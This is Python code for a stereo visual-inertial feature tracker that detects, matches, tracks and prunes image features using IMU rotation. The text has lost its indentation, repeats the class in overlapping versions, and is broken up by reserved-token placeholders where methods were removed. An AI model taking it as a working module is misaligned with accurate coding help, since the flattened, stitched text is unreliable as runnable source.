match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
<|reserved_special_token_0|>
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
<|reserved_special_token_0|>
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
predictFeatureTracking Compensates the rotation between consecutive
camera frames so that feature tracking would be more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
return []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(
epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ImageProcessor(object):
<|reserved_special_token_0|>
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
(Seems doesn't work in python)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
Initialize the image processing sequence, which is basically detect
new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
Tracker features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
predictFeatureTracking Compensates the rotation between consecutive
camera frames so that feature tracking would be more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
return []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(
epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FeatureMeasurement(object):
<|reserved_special_token_0|>
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
